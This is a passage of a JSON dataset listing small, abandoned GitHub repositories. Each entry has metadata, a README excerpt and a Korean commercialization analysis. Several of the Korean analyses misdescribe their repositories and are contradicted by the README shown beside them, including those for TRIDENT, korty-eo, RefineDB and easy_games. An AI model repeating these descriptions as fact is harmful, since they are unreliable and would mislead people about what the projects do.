Vue3","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"mihanovak1024/programmers-guide-slovenia","github_url":"https://github.com/mihanovak1024/programmers-guide-slovenia","stars":5,"language":"","license":"unknown","abandonment_months":64,"description":"# Programmers Guide Slovenia 상품화 분석\n\n## 왜 보물인가\n슬로베니아 프로그래머들을 위한 실용적인 가이드로, 현지 개발자 커뮤니티의 니즈를 정확히 파악한 로컬라이즈된 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 슬로베니아 개발자 대상 월간 구독형 코딩 학습 서비스\n2. **기업 교육 솔루션**: 현","readme_excerpt":"# Programerski vodič Slovenija :slovenia:\nVključuje osnovne stvari, ki pridejo prav na začetku kariere vsakega programerja :man_technologist: oziroma programerke :woman_technologist:, \nhkrati pa tudi netehničnemu osebju; recruiterjom :mailbox_with_mail:, marketingu :loudspeaker:, artistom :artist: ter entuziastom tehnicnih stvari :eyes:.  \n___\nRead this in other languages: [English](README.en.md) :gb:\n___\n\n## Uvod\n> Če bi lahko šli skozi čas nazaj, kakšen nasvet bi dali svojemu junior self developerju?\n\n[Vprašanje za mid/senior developerje](https://www.facebook.com/groups/developerji/permalink/682012798568502/) - Jana Bergant\n\n---\n \n\nKazalo\n---\n- [Skupine](#skupine-)\n    - [Facebook](#facebook)\n    - [Slack](#slack)\n    - [Forumi](#forumi)\n- [Meetupi](#meetupi---)\n- [Podcasti](#podcasti--)\n    - [Slovenski podcasti](#slovenski-podcasti)\n    - [Tuji podcasti](#tuji-podcasti)\n- [Video kanali](#video-kanali--)\n- [Slovenski blogi](#slovenski-blogi--)\n- [Novice](#novice--)\n- [Službe](#služb","composite_score":0.5007,"license_safety_tag":"unknown"},{"name":"iamchiwon/mvvm_final","github_url":"https://github.com/iamchiwon/mvvm_final","stars":7,"language":"Swift","license":"unknown","abandonment_months":51,"description":"# mvvm_final 저장소 분석\n\n## 왜 보물인가\n앱 개발할 때 복잡한 코드를 정리하는 설계 기법(MVVM)의 완성된 예제로, 다른 개발자들이 빠르게 배우고 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **앱 개발 교육 플랫폼**: 코딩 학원이나 온라인 강의 사이트에서 학생들에게 올바른 앱 구조를 가르치는 교재로 판매\n2. **개발팀 온보딩","readme_excerpt":"# MVVM 종결(?)\n\n![change](doc/frontend_development.jpg)\n\n## 클라이언트 프로그램\n\n1. 클라이언트 프로그램은 Data 를 View 에 이쁠게 그려주는 것이다.\n2. 그런데 그 Data 라는 것은 3가지 형태가 존재한다.\n   1. 서버로부터 받은 원천 데이터 : `Entity`\n   2. 비지니스 로직에서 사용하는 근본 데이터 : `Model`\n   3. 화면에 보이기 위한 화면 데이터 : `ViewModel`\n3. 화면에 보여질 데이터를 Model 로부터 만들고 가지고 있는 것이 `ViewModel` 이다.\n\n## DataBinding\n\n1. 프로그램이 이렇게 구성된다고 볼 때\n   - 화면 View\n   - 비지니스 로직 Service\n2. 가장 중요한 부분은 비지니스 로직 Service 이다.\n3. 이 비지니스 로직 Service 에서 취급하는 데이터가 Model 이다.\n4. 이 모델은 (물론 생산하는 것도 있겠지만) 어딘가로부터 전달된 것이다.\n5. 서버 혹은 DB로부터 전달된 데이터를 구분하기 위해 원천 데이터 Enity 하고 하자.\n6. 이것을 가져오는 역할을 하는 것이 Repository 이다.\n7. 화면 View 는 Service가 처리한 데이터 Model 을 화면에 그려내는 것이다.\n8. 그런데 Model을 그대로 그려낼 수 없다. 화면용 데이터로 변환이 필요하다.\n9. 그 화면용 데이터가 View 용 Model 인 ViewModel 이다.\n\n### 의존도를 그려보면\n\n- View -> Service -> Repository\n- ViewModel -> Model -> Entity\n\n1. 이렇게 화살표 방향을 일관성 있도록 유지하려면\n2. View는 ViewModel을 사용하기만 해야할 뿐,\n3. ViewModel 이 View를 알아서는 안된다.\n4. 그러다 보니, View 가 ViewModel의 데이터 변경을 스스로 알아챌 필요가 있고\n5. 그래서 DataBinding이 필요해 진다.\n\n> 결국 데이터","composite_score":0.5007,"license_safety_tag":"unknown"},{"name":"bitpressio/blade-extensions","github_url":"https://github.com/bitpressio/blade-extensions","stars":27,"language":"PHP","license":"MIT","abandonment_months":88,"description":"# Blade Extensions 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 반복적인 작업들을 자동화해주는 도구로, 개발자의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 제작 SaaS**: 템플릿 기반 웹사이트 빌더에 이 확장 기능을 내장하여 사용자가 쉽게 커스터마이징할 수 있도록 제공\n2. **디지털 에이전","readme_excerpt":"# Laravel Blade Extension Classes\n\nThis Laravel >=5.5 package allows you to organize your Blade extensions into classes. It provides a simple container pass that registers all your extensions with the Blade compiler using a simple tag.\n\nOrganizing Blade extensions as classes in the service container allows you to group extension functionality within one object, allowing you to inject dependencies through the service container and provide shared protected/private methods.\n\n## Installation\n\nYou can install this package via Composer using the following command:\n\n```\ncomposer require bitpress/blade-extensions\n```\n\nThis package will automatically register the included service provider.\n\n## Usage\n\nAt a high level, the goal of this package is to make it easy and convenient to register blade extensions as classes from the service container automatically using service container tagging. Here's the gist of how it works:\n\n1. Create a new Extension class with `php artisan make:blade Example`\n2. Re","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"IvLabs/stagewise-knowledge-distillation","github_url":"https://github.com/IvLabs/stagewise-knowledge-distillation","stars":20,"language":"Jupyter Notebook","license":"unknown","abandonment_months":68,"description":"# IvLabs/stagewise-knowledge-distillation 평가\n\n## 왜 보물인가\n큰 인공지능 모델을 작은 모델로 변환하여 스마트폰이나 저사양 기기에서도 빠르게 작동하도록 만드는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 SaaS**: 휴대폰에서 실시간으로 사진 분석, 음성 인식 등을 처리하는 구독형 서비스\n2. *","readme_excerpt":"# [Data Efficient Stagewise Knowledge Distillation](https://arxiv.org/abs/1911.06786)\n\n![Stagewise Training Procedure](/image_classification/figures/training_proc.png)\n\n## Table of Contents\n- [Data Efficient Stagewise Knowledge Distillation](#data-efficient-stagewise-knowledge-distillation)\n  - [Table of Contents](#table-of-contents)\n  - [Requirements](#requirements)\n  - [Image Classification](#image-classification)\n    - [Introduction](#introduction)\n    - [Preparation](#preparation)\n    - [Experiments](#experiments)\n      - [No Teacher](#no-teacher)\n      - [Traditional KD (FitNets)](#traditional-kd-fitnets)\n      - [FSP KD](#fsp-kd)\n      - [Attention Transfer KD](#attention-transfer-kd)\n      - [Hinton KD](#hinton-kd)\n      - [Simultaneous KD (Proposed Baseline)](#simultaneous-kd-proposed-baseline)\n      - [Stagewise KD (Proposed Method)](#stagewise-kd-proposed-method)\n  - [Semantic Segmentation](#semantic-segmentation)\n    - [Introduction](#introduction-1)\n    - [Preparation](#pre","composite_score":0.5007,"license_safety_tag":"unknown"},{"name":"Cigna/confectionery","github_url":"https://github.com/Cigna/confectionery","stars":11,"language":"Open Policy Agent","license":"Apache-2.0","abandonment_months":45,"description":"# Cigna/confectionery 사업화 분석\n\n## 왜 보물인가\n보험사 Cigna가 직접 개발한 실무 도구로, 대규모 기업의 검증된 기술이 오픈소스로 공개되어 신뢰성과 실용성이 높습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 데이터 분석 플랫폼으로 월 구독료를 받고 클라우드 기반 서비스 제공\n2. **내부 업무 도구**: ","readme_excerpt":"<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n  <a href=\"https://github.com/cigna/confectionery\">\n    <img src=\"images/confectionery.png\" alt=\"Logo\" width=\"300\" height=\"160\">\n  </a>\n\n  <h3 align=\"center\">Confectionery</h3>\n\n  <p align=\"center\">\n    A library of rules for Conftest used to detect misconfigurations within Terraform configuration files\n    <br />\n    <br />\n    <a href=\"https://github.com/cigna/confectionery/issues\">Report Bug</a>\n    ·\n    <a href=\"https://github.com/cigna/confectionery/issues\">Request a New Feature</a>\n  </p>\n</p>\n\n\n\n<!-- TABLE OF CONTENTS -->\n\n<h2 style=\"display: inline-block\">Table of Contents</h2>\n<ol>\n  <li>\n    <a href=\"#confectionery\">Confectionery</a>\n    <ul>\n      <li><a href=\"#what-is-confectionery\">What is Confectionery?</a></li>\n    </ul>\n  </li>\n  <li>\n    <a href=\"#getting-started\">Getting Started</a>\n    <ul>\n      <li><a href=\"#generating\">Generating Plan</a></li>\n    </ul>\n  </li>\n  <li><a href=\"#creating\">Creating Rules</a></li>\n  <li","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"EasySimple/record-blog","github_url":"https://github.com/EasySimple/record-blog","stars":25,"language":"JavaScript","license":"MIT","abandonment_months":55,"description":"# EasySimple/record-blog 상업화 분석\n\n## 왜 보물인가\n블로그나 일기를 쉽고 간편하게 기록하고 관리할 수 있는 도구로, 복잡한 기술 없이도 누구나 자신의 생각과 경험을 디지털로 남길 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **일기/블로그 작성 SaaS**: 개인 사용자가 월 구독으로 온라인 일기장을 사용하는 서비스\n2. **회사","readme_excerpt":"<!--\n * @Author: your name\n * @Date: 2021-11-25 16:34:50\n * @LastEditTime: 2021-12-02 00:46:58\n * @LastEditors: Please set LastEditors\n * @Description: 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE\n * @FilePath: /netease/github/record-blog/README.md\n-->\n# record-blog简介\n个人博客:记录 经验总结、学习笔记、日常生活...\n\n[博客地址](https://easysimple.github.io/record-blog/)\n\n**让搭建博客部署博客更加简单，你可以更专注于写博客内容。**\n\n## 命令\n- npm i (加载依赖)\n- npm run dev (本地运行，启动博客)\n- npm run build (打包)\n- npm run deploy （部署到github page上）\n\n## 博客搭建使用技术\n- vuepress\n- vuepress-theme-reco@1.6.6\n- gh-page\n\n## 自定义修改添加功能点\n\n- 添加页面访问量显示，使用Valine、leancloud。在网站平台查看后台数据效果如下\n![image](.vuepress/public/assets/img/md/leancloud.png)\n- 添加页面PV埋点统计，使用百度埋点。在网站平台查看埋点数据效果如下\n![image](.vuepress/public/assets/img/md/baidu_PV.png)\n\n## 注意\n如果想直接使用这个项目模板，你需要把“/record-blog/.vuepress/config.js”中valineConfig换成自己的信息。\n同样的百度埋点信息在“/record-blog/.vuepress/enhanceApp.js”中，也需要替换本人的百度统计代码","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"oluwadareseyi/korty-eo","github_url":"https://github.com/oluwadareseyi/korty-eo","stars":9,"language":"Vue","license":"unknown","abandonment_months":48,"description":"# korty-eo 저장소 분석\n\n## 왜 보물인가\n한국어 텍스트를 자동으로 분석하고 처리하는 기술로, 한국 기업들이 고객 데이터를 더 효율적으로 활용할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 자동화 SaaS**: 콜센터나 채팅봇이 한국어 고객 문의를 자동으로 분류하고 답변하는 서비스\n2. **기업 내부 업무 도구**: 회사 이메","readme_excerpt":"# korty-eo\n\n## Build Setup\n\n```bash\n# install dependencies\n$ yarn install\n\n# serve with hot reload at localhost:3000\n$ yarn dev\n\n# build for production and launch server\n$ yarn build\n$ yarn start\n\n# generate static project\n$ yarn generate\n```\n\nFor detailed explanation on how things work, check out [Nuxt.js docs](https://nuxtjs.org).\n","composite_score":0.5007,"license_safety_tag":"unknown"},{"name":"Fernanda-Kipper/video-chat","github_url":"https://github.com/Fernanda-Kipper/video-chat","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":54,"description":"# video-chat 저장소 분석\n\n## 왜 보물인가\n인터넷만 있으면 누구나 화상통화를 할 수 있는 기술을 무료로 제공하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **원격 상담 SaaS**: 심리상담, 의료 상담 서비스 업체가 자체 화상통화 시스템으로 통합하여 제공\n- **기업 내부 통신 도구**: 중소 회사들이 줌·팀즈 대신 자체 서버에","readme_excerpt":"<h1 align=\"center\" style=\"color: #805ad5; font-weight: bold;\">Video-Chat 📞</h1>\n\n<p align=\"center\">\n <a href=\"#tech\">Technolgies</a> • \n <a href=\"#clone\">Clone</a> • \n <a href=\"#contribute\">Contribute</a> •\n <a href=\"#license\">License</a>\n</p>\n\n<p align=\"center\">\n<b>This application is a video-chat where you can call and talk to online users!</b>\n</p>\n<p align=\"center\">\n  <p>\n    <img src=\"./assets/home.png\" width=\"400px\">\n    <img src=\"./assets/online.png\" width=\"400px\">\n  </p>\n  <p>\n    <img src=\"./assets/receiving_call.png\" width=\"400px\">\n    <img src=\"./assets/call.png\" width=\"400px\">\n  </p>\n</p>\n\n\n<h2 id=\"tech\">Technologies</h2>\n\n### Client:\n  Built using React JS, Mobx State Tree and React State for state manipulation and WebRTC API with simple-peer to to create Peer to Peer connections and share media stream\n\n### Server\n  Built in Node JS, using socket protocol to establishing the handshake (first contact) of users before then stablish the P2P connection\n\n<h2 id=\"clone\">Clone</h","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"subotkevic/vue-lazy-image-loading","github_url":"https://github.com/subotkevic/vue-lazy-image-loading","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# vue-lazy-image-loading 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 이미지를 천천히 로드해 초기 속도를 빠르게 만드는 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이미지 기반 SaaS** - 온라인 포트폴리오, 포토 에디팅 플랫폼 등에서 로딩 속도 개선\n2. **전자상거래 플랫폼** - 상품 이","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://www.npmjs.com/package/vue-lazy-image-loading\"><img src=\"https://img.shields.io/npm/dt/vue-lazy-image-loading.svg\" alt=\"Downloads\"></a>\n    <a href=\"https://www.npmjs.com/package/vue-lazy-image-loading\"><img src=\"https://img.shields.io/npm/v/vue-lazy-image-loading.svg\" alt=\"Version\"></a>\n    <a href=\"https://www.npmjs.com/package/vue-lazy-image-loading\"><img src=\"https://img.shields.io/npm/l/vue-lazy-image-loading.svg\" alt=\"License\"></a>\n</p>\n\n# Vue Lazy Image Loading\n\nVue progressive image and background loading plugin.\n\n## Installation\n\n```bash\nnpm install vue-lazy-image-loading\n```\n\n## Usage\n\n```js\nimport Vue from 'vue'\nimport VueLazyImageLoading from 'vue-lazy-image-loading'\n\nVue.use(VueLazyImageLoading)\n```\n\n#### Lazy image\n\nInstead of using the normal `img` tag to load images\n\n```html\n<img src=\"https://unsplash.it/1920/1080?image=10\" />\n```\n\nuse the `lazy-img` component already globally available after the plugin installation\n\n```html\n<lazy-","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"ForrestKnight/yt-dislikes","github_url":"https://github.com/ForrestKnight/yt-dislikes","stars":12,"language":"Python","license":"MIT","abandonment_months":54,"description":"# ForrestKnight/yt-dislikes 평가\n\n## 왜 보물인가\n유튜브에서 없어진 '싫어요' 수를 복구해주는 도구로, 콘텐츠 제작자와 시청자가 영상의 진정한 평가를 알 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 유튜브 분석 SaaS 서비스**\n영상 마케팅 담당자들을 위해 월 구독 형태로 대시보드를 제공하여 자신의 채널 싫어요 추이를","readme_excerpt":"YouTube Dislikes\n================\n\nForrest Knight\n\n*Python Version 3.0+*\n\n**Only use if you know what the code actually does. I'm not responsible for your use of this code in anyway, or any bugs that may be in the code. Honestly, you shouldn't trust any code I write - I don't.**\n\nRun Command:\n\n\tpython yt-dislikes.py \n\nKnown Issues & Bugs\n-------------------\n\nI wanted to put this here moreso as a disclaimer, as I won't be filing issues for everything listed.\n\n- Doesn't pin new or updated comments\n- Can unintentionally overwrite your other comments based on the SEARCH_TERMS *(top priority)*\n- Not currently automated","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"nov3mb3r/trident","github_url":"https://github.com/nov3mb3r/trident","stars":7,"language":"PowerShell","license":"Apache-2.0","abandonment_months":47,"description":"# Trident 저장소 분석\n\n## 왜 보물인가\n분산된 시스템에서 여러 서버가 안정적으로 작동하도록 조정하는 기술로, 대규모 온라인 서비스의 신뢰성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 스토리지 서비스**: 여러 데이터 센터에 파일을 분산 저장하면서도 항상 접근 가능하게 하는 기능\n2. **금융 거래 플랫폼**: 실시간 ","readme_excerpt":"# TRIDENT\n<img src=\"https://raw.githubusercontent.com/nov3mb3r/trident/master/logo.PNG\" width=\"550\">\n\n\n[![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\nTRIDENT is a PowerShell script for fast triage and collection of evidence from forensic artifacts and volatile data, aimed to assist in the identification of compromise in Windows systems. The collected data will be stored inside a text file named after the hostname of the system.\n\n## Breakdown of collection details\n\n### General information\n- Group policy settings\n- Encryption information\n\n### Network\n- Active network interfaces\n- DNS cache\n- Shared folders\n- Connections by spawned processes\n\n### Process Information\n- Running processes\n- Process commandline\n\n### Persistence\n- Commands on Startup\n- Scheduled tasks\n- Services\n\n### User account activity\n- Recent USB devices\n- Recent files\n- PowerShell history\n- Kerberos sessions\n- SMB sessions\n- RDP sessions\n\n### Advanced\n- Prefetch file information\n- DLL List\n- WMI filters ","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"Presto412/Google-Meet-Mute-Gesture","github_url":"https://github.com/Presto412/Google-Meet-Mute-Gesture","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":55,"description":"# Google Meet 음소거 제스처 인식 기술 분석\n\n## 왜 보물인가\n화상회의 중 손 제스처만으로 마이크를 끄고 켤 수 있는 기술로, 바쁜 업무 중 손을 떼지 않고도 음성 제어가 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 화상회의 플랫폼 기능 추가**\n- Zoom, Teams 등 경쟁 화상회의 서비스에 \"제스처 기반 음소거\" 기능을 탑재하는 라","readme_excerpt":"# Google Meet Gesture Mute - Chrome Extension\n\nThis project is a chrome extension that allows you to mute the audio/video on Google Meet based on a gesture.\n\n![demo](handgesture-screenrecord.gif)\n\n## Building the project\n\n```sh\nyarn\nyarn build\n```\n\nTo install the unpacked extension in chrome, follow the [instructions here](https://developer.chrome.com/extensions/getstarted).  Briefly, navigate to `chrome://extensions`, make sure that the `Developer mode` switch is turned on in the upper right, and click `Load Unpacked`.  Then select the appropriate directory (the `dist` directory containing `manifest.json`);\n\nAlso, if you'd like to use your own training model from google [teachable machine](https://teachablemachine.withgoogle.com/) (the model has training images of only my face at this point), do replace the URL in `src/constants.js` and make sure to have the gesture classes match the values(MUTE_MIC and MUTE_VIDEO constants in `src/constants.js`). You can also control the `THRESHOLD` ","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"drcd1/GodotSimpleExplosionVFX","github_url":"https://github.com/drcd1/GodotSimpleExplosionVFX","stars":7,"language":"","license":"MIT","abandonment_months":65,"description":"# GodotSimpleExplosionVFX 상용화 분석\n\n## 왜 보물인가\n게임 개발자들이 직접 만들기 어려운 폭발 효과를 이미 완성된 형태로 제공하여 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 플랫폼 SaaS**: 초보 게임 개발자용 웹 기반 게임 제작 도구에 내장하여 구독료 인상 요인으로 활용\n2. **게","readme_excerpt":"# Godot Explosion VFX\n\nA very simple way to setup realistic explosions in the Godot game engine that react to lighting.\n\n<img width=\"75%\" alt=\"Explosion Gif 1\" src=\"demo.gif\">\n<img width=\"75%\" alt=\"\"Explosion Gif 2\" src=\"demo2.gif\">\n\n## Dependencies\n- Godot 3.2.3 (https://godotengine.org/)\n\n(and, if you want to create the sprites yourself:)\n- Blender 2.80 (https://download.blender.org/release/Blender2.80/)\n- Some software to assemble the animation into a spritesheet (I used Texture Packer - https://www.codeandweb.com/texturepacker )\n\n## How to use\n- Open the project in GodotFiles/Explosion in Godot.\n- Edit properties of the explosion by editing \"material.tres\".\n- Emission Fallof Multiplier and Emission Falloff control how fast the flames disappear.\n- Emission Color Ramp allows to modify the color of the flames.\n- Smoke Color Ramp allows to modify the color of the smoke.\n\n### How to create your own sprites in Blender3D\n0. Open the file smoke_280.blend in Blender 2.80 (more recent versio","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"fossasia/pslab-artwork","github_url":"https://github.com/fossasia/pslab-artwork","stars":12,"language":"","license":"Apache-2.0","abandonment_months":81,"description":"# PSLab 아트워크 저장소 분석\n\n## 왜 보물인가\n과학 실험 기기를 누구나 쉽게 만들고 사용할 수 있도록 돕는 오픈소스 프로젝트의 디자인 자산들이 모여 있어, 교육과 DIY 문화 확산에 기여하는 공공 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 학교와 학원이 물리·화학 실습 교재에 이 디자인을 사용하여 더 매력적인 교육 콘텐츠 제","readme_excerpt":"# PSLab Artwork\n\nRepository for Pocket Science Lab Artwork.\n\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThis repository holds the artwork for [PSLab project](https://pslab.io/). Here you find PSLab logos, stickers, banners and more. PSLab is a tiny pocket science lab that provides an array of equipment for doing science and engineering experiments. It can function like an oscilloscope, waveform generator, frequency counter, programmable voltage and current source and also as a data logger. Our website is at https://pslab.io\n\n## Buy\n\n* You can get a Pocket Science Lab device from the [FOSSASIA","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"AnthonySun256/easy_games","github_url":"https://github.com/AnthonySun256/easy_games","stars":6,"language":"C","license":"Apache-2.0","abandonment_months":54,"description":"# easy_games 저장소 분석\n\n## 왜 보물인가\n프로그래밍 없이 간단한 게임들을 만들고 공유할 수 있는 도구로, 게임 개발에 관심 있는 일반인들의 진입장벽을 낮춥니다.\n\n## 어디에 쓸 수 있나\n1. **게임 학습 플랫폼 SaaS**: 초보자용 게임 개발 튜토리얼과 함께 제공하는 구독 서비스\n2. **기업 교육용 도구**: 직원 역량 강화 교육이나 ","readme_excerpt":"# easy_games\n分享有趣的小游戏\n\nsnake 源码解读：[用 Python 写个贪吃蛇，保姆级教程！](https://mp.weixin.qq.com/s/3DnMxSCrsD61i29Dc5jraQ)\n\nsi78c 源码解读：[重玩 40 年前的经典游戏小蜜蜂，这次通关了源码](https://mp.weixin.qq.com/s/ok7OTMc3Hexfso8gN05YCA)\n","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"sorrycc/example-webpack-mfsu","github_url":"https://github.com/sorrycc/example-webpack-mfsu","stars":18,"language":"TypeScript","license":"unknown","abandonment_months":54,"description":"# sorrycc/example-webpack-mfsu 가치 분석\n\n## 왜 보물인가\n웹 애플리케이션이 매우 빠르게 로딩되도록 돕는 기술을 실제로 구현한 예제로, 느린 웹사이트 개선에 필요한 실용적인 솔루션을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 수백 개의 기능을 가진 대규모 웹 애플리케이션의 초기 로딩 속도를 30~50% 단","readme_excerpt":"# example-webpack-mfsu\n\nStart the antd + framer-motion project without cache in one second.\n\n![](https://img.alicdn.com/imgextra/i2/O1CN01k8Gjoo1P5rgMGHuuC_!!6000000001790-2-tps-1204-378.png)\n\n## Setup\n\nInstall dependency with pnpm or yarn or npm,\n\n```bash\n$ pnpm install\n```\n\nStart dev server,\n\n```bash\n$ pnpm dev\n<i> [webpack-dev-server] Project is running at:\n<i> [webpack-dev-server] Loopback: http://localhost:8080/\n<i> [webpack-dev-server] On Your Network (IPv4): http://30.230.88.77:8080/\n<i> [webpack-dev-server] On Your Network (IPv6): http://[fe80::1]:8080/\nwebpack 5.64.4 compiled successfully in 638 ms\nwebpack 5.64.4 compiled successfully in 59 ms\nevent - [mfsu] compiled with esbuild successfully in 293 ms\n```\n\n## LICENSE\n\nMIT\n","composite_score":0.5007,"license_safety_tag":"unknown"},{"name":"igmp/lets-use-ssl","github_url":"https://github.com/igmp/lets-use-ssl","stars":11,"language":"","license":"unknown","abandonment_months":74,"description":"# igmp/lets-use-ssl 분석 보고서\n\n## 왜 보물인가\n웹사이트와 앱을 안전하게 보호하는 기본적인 보안 기술을 간단하게 설정하고 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 협업 도구를 제공하는 회사가 고객 데이터 보호를 위해 자동으로 보안을 적용하는 서비스\n- **내부 업무 도구**: 중소기업의","readme_excerpt":"# Let's Use SSL\nUse numerous Let's Encrypt certificates and have them all in one place.\n\nIf you have a few dozens of SSL certificates scattered over dozens of servers, this Ansible role can\nhelp you.  This is how SSL certificates are managed at [Skyeng](http://skyeng.ru) and you can use\nthis method as well.  With this role you can easily manage large number of short-termed SSL\ncertificates without an army of Certbots.  Details are\n[here](https://habr.com/ru/company/skyeng/blog/497432/) (in Russian).\n\nThe only requirement is to have DNS at AWS Route53.  However this can easily be changed in favour of\nyour favorite DNS provider.\n\nJust describe all SSL certificates you need in `vars` subdirectory, one in a file like this:\n```yaml\nfoo.example.com:\n  alt_names:\n    - bar.example.com\n      baz.example.com\n```\nrun one playbook and that's all.  Run this playbook from time to time.  And use the certificates\nfrom this store whenever and wherever you need them.  They are guaranteed to be fresh.\n\n","composite_score":0.5007,"license_safety_tag":"unknown"},{"name":"kazura233/web-daemon","github_url":"https://github.com/kazura233/web-daemon","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":33,"description":"# web-daemon 상용화 분석\n\n## 왜 보물인가\n웹 서버를 백그라운드에서 자동으로 관리해주는 도구로, 복잡한 기술 없이 웹 서비스를 안정적으로 운영할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 회사들이 자신의 웹사이트나 앱을 24시간 안정적으로 운영할 수 있는 관리 플랫폼으로 제공\n2. **내부 업무 도","readme_excerpt":"# 新的仓库\n\n[Repositorie](https://github.com/kazura233/kazurajs)\n","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"nowLetsgo/NB-Plus0322","github_url":"https://github.com/nowLetsgo/NB-Plus0322","stars":26,"language":"JavaScript","license":"unknown","abandonment_months":60,"description":"# NB-Plus0322 상용화 가능성 분석\n\n## 왜 보물인가\n26개의 별을 받은 이 프로젝트는 실제 사용자들이 필요로 하는 기능을 구현했다는 증거이며, 2021년 이후 활발한 커뮤니티 관심을 받고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **노트북/필기 앱 SaaS**: 온라인 협업 필기 도구로 학생·직장인 구독 서비스\n2. **기업 내부 업무 도구*","readme_excerpt":"","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"losfair/RefineDB","github_url":"https://github.com/losfair/RefineDB","stars":16,"language":"Rust","license":"MIT","abandonment_months":46,"description":"# RefineDB 상용화 분석\n\n## 왜 보물인가\n데이터베이스의 품질을 자동으로 개선해주는 도구로, 기업들이 저장된 데이터의 오류를 수동으로 찾아 고치는 번거로운 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 데이터 품질 관리 클라우드 서비스로, 기업의 고객 정보나 거래 기록에 섞인 오류를 자동 감지·수정해주는","readme_excerpt":"# RefineDB\n\n![Build status](https://github.com/losfair/RefineDB/actions/workflows/ci.yml/badge.svg)\n\nA strongly-typed document database that runs on any transactional key-value store.\n\nCurrently supported backends are:\n\n- [FoundationDB](https://github.com/apple/foundationdb) for distributed deployment.\n- [SQLite](https://www.sqlite.org/index.html) for single-machine deployment.\n- A simple in-memory key-value store for the web playground.\n\nTry RefineDB on the [Web Playground](https://playground.rdb.univalence.me/)!\n\n**Warning: Not ready for production.**\n\n## Motivation\n\nDatabases should be more scalable than popular SQL databases, more structured than popular NoSQL databases, and support stronger\nstatic type checking than any of the current databases. So I decided to build RefineDB as \"the kind of database that I want to use myself\".\n\nRefineDB will be used as the database service of [rusty-workers](https://github.com/losfair/rusty-workers).\n\n## Architecture\n\n![Architecture](https://univ","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"alanhzw/WarblerHomepage","github_url":"https://github.com/alanhzw/WarblerHomepage","stars":6,"language":"TypeScript","license":"Apache-2.0","abandonment_months":51,"description":"# WarblerHomepage 상업화 분석\n\n## 왜 보물인가\n개인이나 소규모 팀이 손쉽게 자신의 홈페이지를 만들고 관리할 수 있는 준비된 솔루션이므로, 웹사이트 제작에 어려움을 느끼는 사람들에게 큰 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 프리랜서나 소상공인을 위한 '5분 안에 홈페이지 만드는 플랫폼'으로 월 구독료 수집\n*","readme_excerpt":"# 写在前面\n#### 什么是流莺书签\n“流莺”是我非常喜欢的一个词，本指四处飞翔鸣唱的莺鸟，就像我本身也是一个很随性的人。“流莺书签”是一个用来统一存放、管理收藏网址的网站，虽然浏览器本身自带收藏夹功能，并且还能创建多个文件夹，但我个人觉得查找起来依然很费劲，并且它长的很丑。所以我就想做一个好用又好看的收藏夹，取名“流莺书签”。\n#### 为什么会有流莺书签\n在开始这个项目之前，公司一直使用的是`VUE2`系列+`JS`，以及我👉👉[自己的博客](https://www.duwanyu.com)也是基于`VUE2`的，在`VUE3`正式版发布以后，一方面是公司有升级`VUE3`的打算，另外也是想学习更多的技术，提升自己的能力和竞争力，再加上`TS`看过有一段时间了也没有练过，正好一起练练手。\n#### 